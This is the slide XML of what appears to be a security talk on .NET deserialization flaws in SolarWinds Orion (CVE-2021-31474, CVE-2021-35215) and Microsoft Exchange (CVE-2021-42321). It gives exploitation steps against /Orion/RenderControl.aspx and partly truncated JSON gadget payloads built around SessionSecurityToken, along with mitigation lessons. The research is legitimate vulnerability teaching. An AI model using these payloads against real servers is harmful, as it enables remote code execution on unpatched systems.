              <a:t>We want to send a valid ActionContextBase object, with a nested gadget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1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FB6-221D-B5AE-6632-1D9B722E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2C06-9FE1-0057-E733-0489DAB3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de/serialization?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example Gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SolarWinds Orion Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft Exchange Vulnerabilities</a:t>
            </a:r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878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ActionContextBase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C1C21-22D1-3C90-3D16-9E49B9F7CDD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2271155"/>
            <a:ext cx="89480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ActionContextBase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ActionEnviromentType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EnviromentType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MacroContext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MacroContext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ActionContextBase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MacroContext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MacroContext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32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MacroContext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B5138-48D2-C2EF-EE73-2675B963ED73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="257299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MacroContext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940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ContextBase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D1F9C-7102-77BA-0FC5-E0971497A023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="23764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DataContract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ReportingContext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AlertingContext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GenericContext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SwisEntityContext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ContextBase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999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SwisEntityContext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67879-5379-DA5A-AA1F-D68FB701A5AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1935486"/>
            <a:ext cx="772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SwisEntityContext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ContextBase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EntityUri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PropertyBag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EntityProperties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"Net object properties"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681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PropertyBag Class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B28DB-C973-53BB-352C-231AB42EFCEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2169556"/>
            <a:ext cx="102071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PropertyBag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IXmlSerializable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PropertyBag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PropertyBag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3744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4B3F-509E-432B-222F-BC9C6D87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an object with a nested gadget – Final Payload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FBAA8-4D60-EE23-0FC1-15C660908419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283030" y="1426062"/>
            <a:ext cx="1124857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[...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...]</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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"ActionContext"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"SolarWinds.Orion.Core.Models.Actions.Contexts.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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AlertingActionContext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SolarWinds.Orion.Actions.Models"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"ExecutionMode"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"EnviromentType"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"EntityType"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"Orion.NetPath.ServiceAssignments"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"EntityUri"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"swis://EX-MB02./Orion/Orion.NetPath.ServiceAssignments/ProbeID=1,EndpointServiceID=1"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"EntityUris"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"IsGlobalAlert"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"AlertContext"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"SolarWinds.Orion.Core.Models.Actions.Contexts.AlertContext, SolarWinds.Orion.Actions.Models"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"AlertName"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"Path to Google"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"CreatedBy"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CA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"AlertActiveId"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"AlertObjectId"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"NetObjectData"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"ObjectDataExists"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"MacroContext"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"SolarWinds.Orion.Core.Models.MacroParsing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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MacroContext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SolarWinds.Orion.Core.Models.V1"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"contexts"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"SolarWinds.Orion.Core.Models.MacroParsing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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SwisEntityContext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SolarWinds.Orion.Core.Models.V1"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"EntityProperties"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"SolarWinds.InformationService.Contract2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA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PropertyBag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SolarWinds.InformationService.Contract2"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"System.IdentityModel.Tokens.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="10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SessionSecurityToken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System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"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"SessionToken"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"$type"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"System.Byte[], mscorlib"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CA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"$value"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"QBRTZWN1cml0eUNvbnRleHRUb2tlbkAHVm..."</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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[...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000" b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...]</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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5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CVE-2021-31474 | ZDI-21-602 - Summary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A4B-B3BD-0845-020E-EC87F5E2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Blocking a list of disallowed types is insufficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>List needs to be constantly updated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Relying on expected types in Json.NET is insufficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Inner properties can contain malicious types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098629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CVE-2021-35215 | ZDI-21-1245</a:t>
            </a:r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4C33E-AB2D-4EFE-AC20-A221136EF26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5836722" y="567269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Meme credit to Nguyễn Tiến Giang</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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6C9112-3437-BA54-A873-2E3DA24C7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09701" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17221171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CVE-2021-35215 | ZDI-21-1245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A4B-B3BD-0845-020E-EC87F5E2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 err="1"/>
              <a:t>SolarWinds.Orion.Web.Actions.ActionPluginBaseView</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Uses Json.NET for deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Discovered by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" err="1"/>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" err="1"/>
              <a:t>Tiến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" err="1"/>
              <a:t>Giang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t> from VNPT Cyber Immunity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>Patched in July 2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95730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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Orion_RenderControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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40B43-95F5-856B-E7B9-DA557FE52688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512619" y="1880627"/>
            <a:ext cx="1062643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HttpMethod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UTF8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probably noone sends those anyway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PropertySetter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LoadJsonData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576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DDA9-974D-9B52-D02F-170EBDCE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de/serialization?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22D1-1AA6-4939-47AC-57A904B1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9139"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Translating from an object state into a format that can be stored or transmitted and later reconstructed</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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3F55D2E-712E-3955-AFFD-E5B034F4ADDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10127674" y="4274126"/>
            <a:ext cx="1350819" cy="581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  <a:endParaRPr lang="en-CA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1661046-6A2A-CF0B-09F2-63BEF4909851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474516" y="4274126"/>
            <a:ext cx="1350819" cy="5818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  <a:endParaRPr lang="en-CA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EC5B336-D5FD-EAF0-6BD4-A932DD8A9542}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228111" y="4274124"/>
            <a:ext cx="1350819" cy="58189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Byte Stream</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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569BE0C-C395-8682-4E4E-0A73CE422696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7193971" y="4274125"/>
            <a:ext cx="1350819" cy="58189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Byte Stream</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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9FC95-1C87-CA9C-75E7-2DA637A72527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1825335" y="4246417"/>
            <a:ext cx="1409702" cy="369332"/>
            <a:chOff x="1825335" y="4246417"/>
            <a:chExt cx="140970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40600A-9824-C6B9-794C-EF4B847910F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1825335" y="4565070"/>
              <a:ext cx="1402776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7D8FC6-E37C-5FC1-12CA-7B9AA80AE652}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1884218" y="4246417"/>
              <a:ext cx="1350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Serialization</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA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3A0E23-012D-4BA9-6643-EE8DEEB772FF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8544790" y="4565071"/>
            <a:ext cx="1582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CE7FF-999C-07AD-2A46-0DE22E041169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8548255" y="424422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Deserialization</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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2B11678-4917-4998-E695-59791C0D7E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167744" y="4309944"/>
            <a:ext cx="1330036" cy="51025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</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/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5C7610EF-107E-D8C2-4E4F-521C96BBE8AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299364" y="3061855"/>
            <a:ext cx="1198416" cy="651163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</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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BE94E2E-1ED2-BF97-4247-F8C52C004EEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167744" y="5597235"/>
            <a:ext cx="1330036" cy="568037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Memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-C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2108A0-31BC-B095-B563-F08A19231FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="20" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4578930" y="4565069"/>
            <a:ext cx="588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89C2AB-6E1A-1987-D33F-556AB4A69290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4578930" y="3387437"/>
            <a:ext cx="720434" cy="117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E5D2B2-3650-35F0-E17C-3D58E122CF7A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4578930" y="4565070"/>
            <a:ext cx="588814" cy="131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F113EE-BFC7-69B5-74E0-4EA803787C81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="21" idx="3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497780" y="3387437"/>
            <a:ext cx="696191" cy="117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C051C9-B0DB-D89D-DEC7-743001584B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="4"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6497780" y="4565069"/>
            <a:ext cx="6961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CD97E1-1C2A-8216-2C9D-12901E58A518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97780" y="4565071"/>
            <a:ext cx="696191" cy="1316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47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PropertySetter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851AD-EFBD-6115-01B7-C84AA9001859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2143359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LoadJsonData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StreamReader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_serializer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_serializer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JavaScriptSerializer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_serializer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ReadToEnd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25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Orion_RenderControl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CAAA6-BC86-EBA4-CD82-424516B72864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="263237" y="1794598"/>
            <a:ext cx="1178328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OnInit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EventArgs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GetParam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ParamControl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ArgumentException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"Page requires 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ParamControl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or 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ParamResourceID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in query string"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"SolarWinds.Orion.Web"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todo: modular plugin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Activator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CreateInstance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"OrionWeb"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Unwrap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LoadControl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ApplyPropertiesAndAttributes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5064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TemplateControl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D311D-EA54-1C7C-BEC4-9691743E4C5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692726" y="2274838"/>
            <a:ext cx="90816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TemplateControl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INamingContainer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IFilterResolutionService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virtualPath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VirtualPath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virtualPath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44349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Orion_RenderControl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3C698-ED91-7F91-9187-A830D268ED1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332508" y="1984812"/>
            <a:ext cx="1140229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ApplyPropertiesAndAttributes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Web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prefixConfig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"config."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prefixAttrib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"attrib."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GetAttributes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AllKeys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prefixConfig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OrdinalIgnoreCase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PropertySetter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prefixConfig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HttpUtility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HtmlEncode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QueryString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prefixConfig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prefixConfig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PropertySetter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SetProperties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controlToRender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950236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PropertySetter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D256B-CDE0-64A4-883C-DEFD41154C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059873" y="2136339"/>
            <a:ext cx="9899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SetProperties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883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PropertySetter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34411-71F4-29A9-15F2-B620CB109D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422563" y="1818420"/>
            <a:ext cx="113468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GetProperty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CanWrite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SetValue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converted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33156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A20-F9F1-D5F8-5C42-1C0F9922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to Exploitation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B595-F3FE-8FC0-C7B6-8ABB7DA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call an arbitrary setter of a TemplateControl class with attacker-controlled data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Can this be abused for RCE?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355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ActionPluginBaseView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989B-19B1-5176-3FAB-D95F0418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211"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Inherits from TemplateControl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34CDD-E0E5-7EC0-5192-71B551567027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2766675"/>
            <a:ext cx="8201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ActionPluginBaseView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ActionBaseView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ActionBaseView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TemplateControl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IAttributeAccessor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INonBindingContainer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INamingContainer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IUserControlDesignerAccessor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1356992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ActionPluginBaseView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989B-19B1-5176-3FAB-D95F0418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211"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Has an interesting setter function for ViewContextJsonString property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A097-218D-C460-1C44-D91588409428}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="269758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ViewContextJsonString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_viewContextJsonString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_viewContextJsonString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ParseViewContext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124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ActionPluginBaseView Class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D85AD-058E-D3E0-C92E-3CE77045332C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491836" y="1853287"/>
            <a:ext cx="114092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ParseViewContext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ViewContextJsonString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JsonSerializerSettings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TypeNameHandling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TypeNameHandling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="14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Objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1400" b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EnviromentType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ActionEnviromentType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AlertingViewContext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JsonConvert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DeserializeObject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400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AlertingActionContext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ViewContextJsonString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EnviromentType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ActionEnviromentType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ReportingViewContext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JsonConvert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DeserializeObject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400" b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ReportingActionContext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ViewContextJsonString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73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541D-B0C2-425E-2A30-84472F7A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leads to insecure deserialization?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B525-1FE9-01C8-1E1C-F520E0CA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Untrusted input sent to deserialization engine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Insufficient checking of object types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1248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AD69-AC8E-F72F-9F91-C393C97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SolarWinds Orion Platform 2020.2.5 – ActionPluginBaseView Class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4A03-94D0-527B-24F3-BD243C87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6848"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Both deserialized classes inherit from ActionContextBase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We can reuse our malicious ActionContextBase object from before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7473F-C9AF-BBB5-1C2E-B76090B2F216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3279109"/>
            <a:ext cx="7938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AlertingActionContext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ActionContextBase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ReportingActionContext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ActionContextBase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3682779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A20-F9F1-D5F8-5C42-1C0F9922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to Exploitation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B595-F3FE-8FC0-C7B6-8ABB7DAE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Send a JSON object to vulnerable endpoint “/Orion/RenderControl.aspx”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set “Control” parameter to a path of a Control inheriting from ActionPluginBaseView</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set “config” parameter to an object containing a “ViewContextJsonString” with a value of a crafted JSON object of type AlertingActionContext or ReportingActionContext</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This serialized JSON object will contain a gadget within the nested PropertyBag parameter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207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A20-F9F1-D5F8-5C42-1C0F9922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Payload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5DA9C-04A7-7BDC-6538-9A02C1BF156D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346363" y="1444845"/>
            <a:ext cx="107926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"Control"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"~/Orion/Actions/Controls/CustomPropertyView.ascx"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"EnviromentType"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"Alerting"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200" b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ViewContextJsonString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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SolarWinds.Orion.Core.Models.Actions.Contexts.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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AlertingActionContext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SolarWinds.Orion.Actions.Models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>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[... Truncated ...]</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1200" b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MacroContext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SolarWinds.Orion.Core.Models.MacroParsing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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MacroContext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SolarWinds.Orion.Core.Models.V1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contexts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[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SolarWinds.Orion.Core.Models.MacroParsing.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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SwisEntityContext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SolarWinds.Orion.Core.Models.V1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 object properties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null,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EntityUri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null,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EntityProperties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SolarWinds.InformationService.Contract2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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PropertyBag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SolarWinds.InformationService.Contract2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System.IdentityModel.Tokens.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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SessionSecurityToken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System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089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SessionToken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{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$type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System.Byte[], mscorlib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$value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QBRTZWN1cml0eUNvbnRleHRUb2tlbkA...\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="12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>
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[... Truncated ...]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678627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30828E-BB01-53E0-89E8-4957BF15B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CVE-2021-35215 | ZDI-21-1245 - Summary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0A4B-B3BD-0845-020E-EC87F5E2B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Calling an arbitrary property setter using reflection is dangerous</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="754277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451B-20AC-1E5C-6CD7-38E3748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22156"/>
            <a:ext cx="10515600" cy="2852737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Microsoft Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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9044F5DA-4EB8-0A49-95B6-8DA4894D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719" y="3539837"/>
            <a:ext cx="4395354" cy="29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94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6750A2-AAA0-48F1-D918-9163BE30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BinaryFormatter</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA"/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57E2D6A3-5340-3D73-8816-1E642A9F6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62132"/>
            <a:ext cx="7796177" cy="2224268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BE0C417-B2F1-C2D2-00B5-5CAB42B1B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690689"/>
            <a:ext cx="9511145" cy="1821438"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Known to be insecure for a decade</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>First demonstrated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>James Forshaw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> at BlackHat 2012</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Still used in modern applications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4963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C92-A820-B66B-2278-43C382D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CVE-2021-42321</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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707DF2-C305-B190-5D16-38D210E2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25" y="2282031"/>
            <a:ext cx="5191125" cy="3438525"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1102569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C92-A820-B66B-2278-43C382D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CVE-2021-42321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DC6-6023-673C-AE1A-629804E0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6816" cy="4351338"/>
          </a:xfrm>
        </p:spPr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/>
              <a:t>Microsoft.Exchange.Compliance.Serialization.Formatters.TypedBinaryFormatter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>BinaryFormatter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> with Binder set to ChainedSerializationBinder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Discovered by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Yuhao Weng &amp; Zhiniang Peng &amp; Feng Dong with Sangfor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA"/>
              <a:t>zcgonvh with 360 noah lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Patched in November 2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3126181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 err="1"/>
              <a:t>TypedBinaryFormatter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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3843-FF09-2694-57F2-3C5B66902550}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510180" y="2260616"/>
            <a:ext cx="107847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SerializationBinder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ExchangeBinaryFormatterFactory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ComplianceFormatter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TypedBinaryFormatter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TypedBinaryFormatter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75832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 err="1"/>
              <a:t>ExchangeBinaryFormatterFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>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E4C81-131D-462E-0B12-57BFD9F10089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659309" y="2136338"/>
            <a:ext cx="111180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ChainedSerializationBinder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59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9087-8951-4ED5-E739-BFD9126E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Insecure Deserialization to RCE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7E69-9063-8394-0B0C-A2B581B2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Source – Control deserialized input data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set crafted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Trigger deserialization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sink – Gadget allows reaching interesting code during deserialization process</a:t>
